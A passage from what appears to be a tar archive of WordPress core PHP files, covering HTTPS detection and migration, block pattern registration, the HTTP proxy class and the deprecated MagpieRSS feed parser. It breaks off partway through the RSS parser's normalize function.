return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
block-patterns.php 0000666 00000031635 15224151220 0010213 0 ustar 00 <?php
/**
* Register the block patterns and block patterns categories
*
* @package WordPress
* @since 5.5.0
*/
add_theme_support( 'core-block-patterns' );
/**
* Registers the core block patterns and categories.
*
* @since 5.5.0
* @since 6.3.0 Added source to core block patterns.
* @access private
*/
function _register_core_block_patterns_and_categories() {
$should_register_core_patterns = get_theme_support( 'core-block-patterns' );
if ( $should_register_core_patterns ) {
$core_block_patterns = array(
'query-standard-posts',
'query-medium-posts',
'query-small-posts',
'query-grid-posts',
'query-large-title-posts',
'query-offset-posts',
);
foreach ( $core_block_patterns as $core_block_pattern ) {
$pattern = require __DIR__ . '/block-patterns/' . $core_block_pattern . '.php';
$pattern['source'] = 'core';
register_block_pattern( 'core/' . $core_block_pattern, $pattern );
}
}
register_block_pattern_category(
'banner',
array(
'label' => _x( 'Banners', 'Block pattern category' ),
'description' => __( 'Bold sections designed to showcase key content.' ),
)
);
register_block_pattern_category(
'buttons',
array(
'label' => _x( 'Buttons', 'Block pattern category' ),
'description' => __( 'Patterns that contain buttons and call to actions.' ),
)
);
register_block_pattern_category(
'columns',
array(
'label' => _x( 'Columns', 'Block pattern category' ),
'description' => __( 'Multi-column patterns with more complex layouts.' ),
)
);
register_block_pattern_category(
'text',
array(
'label' => _x( 'Text', 'Block pattern category' ),
'description' => __( 'Patterns containing mostly text.' ),
)
);
register_block_pattern_category(
'query',
array(
'label' => _x( 'Posts', 'Block pattern category' ),
'description' => __( 'Display your latest posts in lists, grids or other layouts.' ),
)
);
register_block_pattern_category(
'featured',
array(
'label' => _x( 'Featured', 'Block pattern category' ),
'description' => __( 'A set of high quality curated patterns.' ),
)
);
register_block_pattern_category(
'call-to-action',
array(
'label' => _x( 'Call to action', 'Block pattern category' ),
'description' => __( 'Sections whose purpose is to trigger a specific action.' ),
)
);
register_block_pattern_category(
'team',
array(
'label' => _x( 'Team', 'Block pattern category' ),
'description' => __( 'A variety of designs to display your team members.' ),
)
);
register_block_pattern_category(
'testimonials',
array(
'label' => _x( 'Testimonials', 'Block pattern category' ),
'description' => __( 'Share reviews and feedback about your brand/business.' ),
)
);
register_block_pattern_category(
'services',
array(
'label' => _x( 'Services', 'Block pattern category' ),
'description' => __( 'Briefly describe what your business does and how you can help.' ),
)
);
register_block_pattern_category(
'contact',
array(
'label' => _x( 'Contact', 'Block pattern category' ),
'description' => __( 'Display your contact information.' ),
)
);
register_block_pattern_category(
'about',
array(
'label' => _x( 'About', 'Block pattern category' ),
'description' => __( 'Introduce yourself.' ),
)
);
register_block_pattern_category(
'portfolio',
array(
'label' => _x( 'Portfolio', 'Block pattern category' ),
'description' => __( 'Showcase your latest work.' ),
)
);
register_block_pattern_category(
'gallery',
array(
'label' => _x( 'Gallery', 'Block pattern category' ),
'description' => __( 'Different layouts for displaying images.' ),
)
);
register_block_pattern_category(
'media',
array(
'label' => _x( 'Media', 'Block pattern category' ),
'description' => __( 'Different layouts containing video or audio.' ),
)
);
register_block_pattern_category(
'videos',
array(
'label' => _x( 'Videos', 'Block pattern category' ),
'description' => __( 'Different layouts containing videos.' ),
)
);
register_block_pattern_category(
'audio',
array(
'label' => _x( 'Audio', 'Block pattern category' ),
'description' => __( 'Different layouts containing audio.' ),
)
);
register_block_pattern_category(
'posts',
array(
'label' => _x( 'Posts', 'Block pattern category' ),
'description' => __( 'Display your latest posts in lists, grids or other layouts.' ),
)
);
register_block_pattern_category(
'footer',
array(
'label' => _x( 'Footers', 'Block pattern category' ),
'description' => __( 'A variety of footer designs displaying information and site navigation.' ),
)
);
register_block_pattern_category(
'header',
array(
'label' => _x( 'Headers', 'Block pattern category' ),
'description' => __( 'A variety of header designs displaying your site title and navigation.' ),
)
);
}
/**
* Normalize the pattern properties to camelCase.
*
* The API's format is snake_case, `register_block_pattern()` expects camelCase.
*
* @since 6.2.0
* @access private
*
* @param array $pattern Pattern as returned from the Pattern Directory API.
* @return array Normalized pattern.
*/
function wp_normalize_remote_block_pattern( $pattern ) {
if ( isset( $pattern['block_types'] ) ) {
$pattern['blockTypes'] = $pattern['block_types'];
unset( $pattern['block_types'] );
}
if ( isset( $pattern['viewport_width'] ) ) {
$pattern['viewportWidth'] = $pattern['viewport_width'];
unset( $pattern['viewport_width'] );
}
return (array) $pattern;
}
/**
* Register Core's official patterns from wordpress.org/patterns.
*
* @since 5.8.0
* @since 5.9.0 The $current_screen argument was removed.
* @since 6.2.0 Normalize the pattern from the API (snake_case) to the
* format expected by `register_block_pattern` (camelCase).
* @since 6.3.0 Add 'pattern-directory/core' to the pattern's 'source'.
*
* @param WP_Screen $deprecated Unused. Formerly the screen that the current request was triggered from.
*/
function _load_remote_block_patterns( $deprecated = null ) {
if ( ! empty( $deprecated ) ) {
_deprecated_argument( __FUNCTION__, '5.9.0' );
$current_screen = $deprecated;
if ( ! $current_screen->is_block_editor ) {
return;
}
}
$supports_core_patterns = get_theme_support( 'core-block-patterns' );
/**
* Filter to disable remote block patterns.
*
* @since 5.8.0
*
* @param bool $should_load_remote
*/
$should_load_remote = apply_filters( 'should_load_remote_block_patterns', true );
if ( $supports_core_patterns && $should_load_remote ) {
$request = new WP_REST_Request( 'GET', '/wp/v2/pattern-directory/patterns' );
$core_keyword_id = 11; // 11 is the ID for "core".
$request->set_param( 'keyword', $core_keyword_id );
$response = rest_do_request( $request );
if ( $response->is_error() ) {
return;
}
$patterns = $response->get_data();
foreach ( $patterns as $pattern ) {
$pattern['source'] = 'pattern-directory/core';
$normalized_pattern = wp_normalize_remote_block_pattern( $pattern );
$pattern_name = 'core/' . sanitize_title( $normalized_pattern['title'] );
register_block_pattern( $pattern_name, $normalized_pattern );
}
}
}
/**
* Register `Featured` (category) patterns from wordpress.org/patterns.
*
* @since 5.9.0
* @since 6.2.0 Normalized the pattern from the API (snake_case) to the
* format expected by `register_block_pattern()` (camelCase).
* @since 6.3.0 Add 'pattern-directory/featured' to the pattern's 'source'.
*/
function _load_remote_featured_patterns() {
$supports_core_patterns = get_theme_support( 'core-block-patterns' );
/** This filter is documented in wp-includes/block-patterns.php */
$should_load_remote = apply_filters( 'should_load_remote_block_patterns', true );
if ( ! $should_load_remote || ! $supports_core_patterns ) {
return;
}
$request = new WP_REST_Request( 'GET', '/wp/v2/pattern-directory/patterns' );
$featured_cat_id = 26; // This is the `Featured` category id from pattern directory.
$request->set_param( 'category', $featured_cat_id );
$response = rest_do_request( $request );
if ( $response->is_error() ) {
return;
}
$patterns = $response->get_data();
$registry = WP_Block_Patterns_Registry::get_instance();
foreach ( $patterns as $pattern ) {
$pattern['source'] = 'pattern-directory/featured';
$normalized_pattern = wp_normalize_remote_block_pattern( $pattern );
$pattern_name = sanitize_title( $normalized_pattern['title'] );
// Some patterns might be already registered as core patterns with the `core` prefix.
$is_registered = $registry->is_registered( $pattern_name ) || $registry->is_registered( "core/$pattern_name" );
if ( ! $is_registered ) {
register_block_pattern( $pattern_name, $normalized_pattern );
}
}
}
/**
* Registers patterns from Pattern Directory provided by a theme's
* `theme.json` file.
*
* @since 6.0.0
* @since 6.2.0 Normalized the pattern from the API (snake_case) to the
* format expected by `register_block_pattern()` (camelCase).
* @since 6.3.0 Add 'pattern-directory/theme' to the pattern's 'source'.
* @access private
*/
function _register_remote_theme_patterns() {
/** This filter is documented in wp-includes/block-patterns.php */
if ( ! apply_filters( 'should_load_remote_block_patterns', true ) ) {
return;
}
if ( ! wp_theme_has_theme_json() ) {
return;
}
$pattern_settings = wp_get_theme_directory_pattern_slugs();
if ( empty( $pattern_settings ) ) {
return;
}
$request = new WP_REST_Request( 'GET', '/wp/v2/pattern-directory/patterns' );
$request['slug'] = $pattern_settings;
$response = rest_do_request( $request );
if ( $response->is_error() ) {
return;
}
$patterns = $response->get_data();
$patterns_registry = WP_Block_Patterns_Registry::get_instance();
foreach ( $patterns as $pattern ) {
$pattern['source'] = 'pattern-directory/theme';
$normalized_pattern = wp_normalize_remote_block_pattern( $pattern );
$pattern_name = sanitize_title( $normalized_pattern['title'] );
// Some patterns might be already registered as core patterns with the `core` prefix.
$is_registered = $patterns_registry->is_registered( $pattern_name ) || $patterns_registry->is_registered( "core/$pattern_name" );
if ( ! $is_registered ) {
register_block_pattern( $pattern_name, $normalized_pattern );
}
}
}
/**
* Register any patterns that the active theme may provide under its
* `./patterns/` directory.
*
* @since 6.0.0
* @since 6.1.0 The `postTypes` property was added.
* @since 6.2.0 The `templateTypes` property was added.
* @since 6.4.0 Uses the `WP_Theme::get_block_patterns` method.
* @access private
*/
function _register_theme_block_patterns() {
/*
* During the bootstrap process, a check for active and valid themes is run.
* If no themes are returned, the theme's functions.php file will not be loaded,
* which can lead to errors if patterns expect some variables or constants to
* already be set at this point, so bail early if that is the case.
*/
if ( empty( wp_get_active_and_valid_themes() ) ) {
return;
}
/*
* Register patterns for the active theme. If the theme is a child theme,
* let it override any patterns from the parent theme that shares the same slug.
*/
$themes = array();
$theme = wp_get_theme();
$themes[] = $theme;
if ( $theme->parent() ) {
$themes[] = $theme->parent();
}
$registry = WP_Block_Patterns_Registry::get_instance();
foreach ( $themes as $theme ) {
$patterns = $theme->get_block_patterns();
$dirpath = $theme->get_stylesheet_directory() . '/patterns/';
$text_domain = $theme->get( 'TextDomain' );
foreach ( $patterns as $file => $pattern_data ) {
if ( $registry->is_registered( $pattern_data['slug'] ) ) {
continue;
}
$file_path = $dirpath . $file;
if ( ! file_exists( $file_path ) ) {
_doing_it_wrong(
__FUNCTION__,
sprintf(
/* translators: %s: file name. */
__( 'Could not register file "%s" as a block pattern as the file does not exist.' ),
$file
),
'6.4.0'
);
$theme->delete_pattern_cache();
continue;
}
$pattern_data['filePath'] = $file_path;
// Translate the pattern metadata.
// phpcs:ignore WordPress.WP.I18n.NonSingularStringLiteralText,WordPress.WP.I18n.NonSingularStringLiteralDomain,WordPress.WP.I18n.LowLevelTranslationFunction
$pattern_data['title'] = translate_with_gettext_context( $pattern_data['title'], 'Pattern title', $text_domain );
if ( ! empty( $pattern_data['description'] ) ) {
// phpcs:ignore WordPress.WP.I18n.NonSingularStringLiteralText,WordPress.WP.I18n.NonSingularStringLiteralDomain,WordPress.WP.I18n.LowLevelTranslationFunction
$pattern_data['description'] = translate_with_gettext_context( $pattern_data['description'], 'Pattern description', $text_domain );
}
register_block_pattern( $pattern_data['slug'], $pattern_data );
}
}
}
add_action( 'init', '_register_theme_block_patterns' );
class-wp-http-proxy.php 0000666 00000013534 15224151220 0011146 0 ustar 00 <?php
/**
* HTTP API: WP_HTTP_Proxy class
*
* @package WordPress
* @subpackage HTTP
* @since 4.4.0
*/
/**
* Core class used to implement HTTP API proxy support.
*
* There are caveats to proxy support. It requires that defines be made in the wp-config.php file to
* enable proxy support. There are also a few filters that plugins can hook into for some of the
* constants.
*
* Please note that only BASIC authentication is supported by most transports.
* cURL MAY support more methods (such as NTLM authentication) depending on your environment.
*
* The constants are as follows:
* <ol>
* <li>WP_PROXY_HOST - Enable proxy support and host for connecting.</li>
* <li>WP_PROXY_PORT - Proxy port for connection. No default, must be defined.</li>
* <li>WP_PROXY_USERNAME - Proxy username, if it requires authentication.</li>
* <li>WP_PROXY_PASSWORD - Proxy password, if it requires authentication.</li>
* <li>WP_PROXY_BYPASS_HOSTS - Will prevent the hosts in this list from going through the proxy.
* You do not need to have localhost and the site host in this list, because they will not be passed
* through the proxy. The list should be presented in a comma separated list, wildcards using * are supported. Example: *.wordpress.org</li>
* </ol>
*
* An example can be as seen below.
*
* define('WP_PROXY_HOST', '192.168.84.101');
* define('WP_PROXY_PORT', '8080');
* define('WP_PROXY_BYPASS_HOSTS', 'localhost, www.example.com, *.wordpress.org');
*
* @link https://core.trac.wordpress.org/ticket/4011 Proxy support ticket in WordPress.
* @link https://core.trac.wordpress.org/ticket/14636 Allow wildcard domains in WP_PROXY_BYPASS_HOSTS
*
* @since 2.8.0
*/
#[AllowDynamicProperties]
class WP_HTTP_Proxy {
/**
* Whether proxy connection should be used.
*
* Constants which control this behavior:
*
* - `WP_PROXY_HOST`
* - `WP_PROXY_PORT`
*
* @since 2.8.0
*
* @return bool
*/
public function is_enabled() {
return defined( 'WP_PROXY_HOST' ) && defined( 'WP_PROXY_PORT' );
}
/**
* Whether authentication should be used.
*
* Constants which control this behavior:
*
* - `WP_PROXY_USERNAME`
* - `WP_PROXY_PASSWORD`
*
* @since 2.8.0
*
* @return bool
*/
public function use_authentication() {
return defined( 'WP_PROXY_USERNAME' ) && defined( 'WP_PROXY_PASSWORD' );
}
/**
* Retrieve the host for the proxy server.
*
* @since 2.8.0
*
* @return string
*/
public function host() {
if ( defined( 'WP_PROXY_HOST' ) ) {
return WP_PROXY_HOST;
}
return '';
}
/**
* Retrieve the port for the proxy server.
*
* @since 2.8.0
*
* @return string
*/
public function port() {
if ( defined( 'WP_PROXY_PORT' ) ) {
return WP_PROXY_PORT;
}
return '';
}
/**
* Retrieve the username for proxy authentication.
*
* @since 2.8.0
*
* @return string
*/
public function username() {
if ( defined( 'WP_PROXY_USERNAME' ) ) {
return WP_PROXY_USERNAME;
}
return '';
}
/**
* Retrieve the password for proxy authentication.
*
* @since 2.8.0
*
* @return string
*/
public function password() {
if ( defined( 'WP_PROXY_PASSWORD' ) ) {
return WP_PROXY_PASSWORD;
}
return '';
}
/**
* Retrieve authentication string for proxy authentication.
*
* @since 2.8.0
*
* @return string
*/
public function authentication() {
return $this->username() . ':' . $this->password();
}
/**
* Retrieve header string for proxy authentication.
*
* @since 2.8.0
*
* @return string
*/
public function authentication_header() {
return 'Proxy-Authorization: Basic ' . base64_encode( $this->authentication() );
}
/**
* Determines whether the request should be sent through a proxy.
*
* We want to keep localhost and the site URL from being sent through the proxy, because
* some proxies can not handle this. We also have the constant available for defining other
* hosts that won't be sent through the proxy.
*
* @since 2.8.0
*
* @param string $uri URL of the request.
* @return bool Whether to send the request through the proxy.
*/
public function send_through_proxy( $uri ) {
$check = parse_url( $uri );
// Malformed URL, can not process, but this could mean ssl, so let through anyway.
if ( false === $check ) {
return true;
}
$home = parse_url( get_option( 'siteurl' ) );
/**
* Filters whether to preempt sending the request through the proxy.
*
* Returning false will bypass the proxy; returning true will send
* the request through the proxy. Returning null bypasses the filter.
*
* @since 3.5.0
*
* @param bool|null $override Whether to send the request through the proxy. Default null.
* @param string $uri URL of the request.
* @param array $check Associative array result of parsing the request URL with `parse_url()`.
* @param array $home Associative array result of parsing the site URL with `parse_url()`.
*/
$result = apply_filters( 'pre_http_send_through_proxy', null, $uri, $check, $home );
if ( ! is_null( $result ) ) {
return $result;
}
if ( 'localhost' === $check['host'] || ( isset( $home['host'] ) && $home['host'] === $check['host'] ) ) {
return false;
}
if ( ! defined( 'WP_PROXY_BYPASS_HOSTS' ) ) {
return true;
}
static $bypass_hosts = null;
static $wildcard_regex = array();
if ( null === $bypass_hosts ) {
$bypass_hosts = preg_split( '|,\s*|', WP_PROXY_BYPASS_HOSTS );
if ( str_contains( WP_PROXY_BYPASS_HOSTS, '*' ) ) {
$wildcard_regex = array();
foreach ( $bypass_hosts as $host ) {
$wildcard_regex[] = str_replace( '\*', '.+', preg_quote( $host, '/' ) );
}
$wildcard_regex = '/^(' . implode( '|', $wildcard_regex ) . ')$/i';
}
}
if ( ! empty( $wildcard_regex ) ) {
return ! preg_match( $wildcard_regex, $check['host'] );
} else {
return ! in_array( $check['host'], $bypass_hosts, true );
}
}
}
https-migration-20260606042005-20260621081108.php 0000666 00000011205 15224151220 0013343 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
rss-20260621173744.php 0000666 00000055243 15224151220 0007465 0 ustar 00 <?php
/**
* MagpieRSS: a simple RSS integration tool
*
* A compiled file for RSS syndication
*
* @author Kellan Elliott-McCrea <kellan@protest.net>
* @version 0.51
* @license GPL
*
* @package External
* @subpackage MagpieRSS
* @deprecated 3.0.0 Use SimplePie instead.
*/
/**
* Deprecated. Use SimplePie (class-simplepie.php) instead.
*/
_deprecated_file( basename( __FILE__ ), '3.0.0', WPINC . '/class-simplepie.php' );
/**
* Fires before MagpieRSS is loaded, to optionally replace it.
*
* @since 2.3.0
* @deprecated 3.0.0
*/
do_action( 'load_feed_engine' );
/** RSS feed constant. */
define('RSS', 'RSS');
define('ATOM', 'Atom');
define('MAGPIE_USER_AGENT', 'WordPress/' . $GLOBALS['wp_version']);
class MagpieRSS {
var $parser;
var $current_item = array(); // item currently being parsed
var $items = array(); // collection of parsed items
var $channel = array(); // hash of channel fields
var $textinput = array();
var $image = array();
var $feed_type;
var $feed_version;
// parser variables
var $stack = array(); // parser stack
var $inchannel = false;
var $initem = false;
var $incontent = false; // if in Atom <content mode="xml"> field
var $intextinput = false;
var $inimage = false;
var $current_field = '';
var $current_namespace = false;
//var $ERROR = "";
var $_CONTENT_CONSTRUCTS = array('content', 'summary', 'info', 'title', 'tagline', 'copyright');
/**
* PHP5 constructor.
*/
function __construct( $source ) {
# Check if PHP xml isn't compiled
#
if ( ! function_exists('xml_parser_create') ) {
wp_trigger_error( '', "PHP's XML extension is not available. Please contact your hosting provider to enable PHP's XML extension." );
return;
}
$parser = xml_parser_create();
$this->parser = $parser;
# pass in parser, and a reference to this object
# set up handlers
#
xml_set_element_handler($this->parser,
array( $this, 'feed_start_element' ), array( $this, 'feed_end_element' ) );
xml_set_character_data_handler( $this->parser, array( $this, 'feed_cdata' ) );
$status = xml_parse( $this->parser, $source );
if (! $status ) {
$errorcode = xml_get_error_code( $this->parser );
if ( $errorcode != XML_ERROR_NONE ) {
$xml_error = xml_error_string( $errorcode );
$error_line = xml_get_current_line_number($this->parser);
$error_col = xml_get_current_column_number($this->parser);
$errormsg = "$xml_error at line $error_line, column $error_col";
$this->error( $errormsg );
}
}
if ( PHP_VERSION_ID < 80000 ) { // xml_parser_free() has no effect as of PHP 8.0.
xml_parser_free( $this->parser );
}
unset( $this->parser );
$this->normalize();
}
/**
* PHP4 constructor.
*/
public function MagpieRSS( $source ) {
self::__construct( $source );
}
function feed_start_element($p, $element, &$attrs) {
$el = $element = strtolower($element);
$attrs = array_change_key_case($attrs, CASE_LOWER);
// check for a namespace, and split if found
$ns = false;
if ( strpos( $element, ':' ) ) {
list($ns, $el) = explode( ':', $element, 2);
}
if ( $ns and $ns != 'rdf' ) {
$this->current_namespace = $ns;
}
# if feed type isn't set, then this is first element of feed
# identify feed from root element
#
if (!isset($this->feed_type) ) {
if ( $el == 'rdf' ) {
$this->feed_type = RSS;
$this->feed_version = '1.0';
}
elseif ( $el == 'rss' ) {
$this->feed_type = RSS;
$this->feed_version = $attrs['version'];
}
elseif ( $el == 'feed' ) {
$this->feed_type = ATOM;
$this->feed_version = $attrs['version'];
$this->inchannel = true;
}
return;
}
if ( $el == 'channel' )
{
$this->inchannel = true;
}
elseif ($el == 'item' or $el == 'entry' )
{
$this->initem = true;
if ( isset($attrs['rdf:about']) ) {
$this->current_item['about'] = $attrs['rdf:about'];
}
}
// if we're in the default namespace of an RSS feed,
// record textinput or image fields
elseif (
$this->feed_type == RSS and
$this->current_namespace == '' and
$el == 'textinput' )
{
$this->intextinput = true;
}
elseif (
$this->feed_type == RSS and
$this->current_namespace == '' and
$el == 'image' )
{
$this->inimage = true;
}
# handle atom content constructs
elseif ( $this->feed_type == ATOM and in_array($el, $this->_CONTENT_CONSTRUCTS) )
{
// avoid clashing w/ RSS mod_content
if ($el == 'content' ) {
$el = 'atom_content';
}
$this->incontent = $el;
}
// if inside an Atom content construct (e.g. content or summary) field treat tags as text
elseif ($this->feed_type == ATOM and $this->incontent )
{
// if tags are inlined, then flatten
$attrs_str = join(' ',
array_map(array('MagpieRSS', 'map_attrs'),
array_keys($attrs),
array_values($attrs) ) );
$this->append_content( "<$element $attrs_str>" );
array_unshift( $this->stack, $el );
}
// Atom support many links per containing element.
// Magpie treats link elements of type rel='alternate'
// as being equivalent to RSS's simple link element.
//
elseif ($this->feed_type == ATOM and $el == 'link' )
{
if ( isset($attrs['rel']) and $attrs['rel'] == 'alternate' )
{
$link_el = 'link';
}
else {
$link_el = 'link_' . $attrs['rel'];
}
$this->append($link_el, $attrs['href']);
}
// set stack[0] to current element
else {
array_unshift($this->stack, $el);
}
}
function feed_cdata ($p, $text) {
if ($this->feed_type == ATOM and $this->incontent)
{
$this->append_content( $text );
}
else {
$current_el = join('_', array_reverse($this->stack));
$this->append($current_el, $text);
}
}
function feed_end_element ($p, $el) {
$el = strtolower($el);
if ( $el == 'item' or $el == 'entry' )
{
$this->items[] = $this->current_item;
$this->current_item = array();
$this->initem = false;
}
elseif ($this->feed_type == RSS and $this->current_namespace == '' and $el == 'textinput' )
{
$this->intextinput = false;
}
elseif ($this->feed_type == RSS and $this->current_namespace == '' and $el == 'image' )
{
$this->inimage = false;
}
elseif ($this->feed_type == ATOM and in_array($el, $this->_CONTENT_CONSTRUCTS) )
{
$this->incontent = false;
}
elseif ($el == 'channel' or $el == 'feed' )
{
$this->inchannel = false;
}
elseif ($this->feed_type == ATOM and $this->incontent ) {
// balance tags properly
// note: This may not actually be necessary
if ( $this->stack[0] == $el )
{
$this->append_content("</$el>");
}
else {
$this->append_content("<$el />");
}
array_shift( $this->stack );
}
else {
array_shift( $this->stack );
}
$this->current_namespace = false;
}
function concat (&$str1, $str2="") {
if (!isset($str1) ) {
$str1="";
}
$str1 .= $str2;
}
function append_content($text) {
if ( $this->initem ) {
$this->concat( $this->current_item[ $this->incontent ], $text );
}
elseif ( $this->inchannel ) {
$this->concat( $this->channel[ $this->incontent ], $text );
}
}
// smart append - field and namespace aware
function append($el, $text) {
if (!$el) {
return;
}
if ( $this->current_namespace )
{
if ( $this->initem ) {
$this->concat(
$this->current_item[ $this->current_namespace ][ $el ], $text);
}
elseif ($this->inchannel) {
$this->concat(
$this->channel[ $this->current_namespace][ $el ], $text );
}
elseif ($this->intextinput) {
$this->concat(
$this->textinput[ $this->current_namespace][ $el ], $text );
}
elseif ($this->inimage) {
$this->concat(
$this->image[ $this->current_namespace ][ $el ], $text );
}
}
else {
if ( $this->initem ) {
$this->concat(
$this->current_item[ $el ], $text);
}
elseif ($this->intextinput) {
$this->concat(
$this->textinput[ $el ], $text );
}
elseif ($this->inimage) {
$this->concat(
$this->image[ $el ], $text );
}
elseif ($this->inchannel) {
$this->concat(
$this->channel[ $el ], $text );
}
}
}
function normalize () {
// if atom populate rss fields
if ( $this->is_atom() ) {
$this->channel['description'] = $this->channel['tagline'];
for ( $i = 0; $i < count($this->items); $i++) {
$item = $this->items[$i];
if ( isset($item['summary']) )
$item['description'] = $item['summary'];
if ( isset($item['atom_content']))
$item['content']['encoded'] = $item['atom_content'];
$this->items[$i] = $item;
}
}
elseif ( $this->is_rss() ) {
$this->channel['tagline'] = $this->channel['description'];
for ( $i = 0; $i < count($this->items); $i++) {
$item = $this->items[$i];
if ( isset($item['description']))
$item['summary'] = $item['description'];
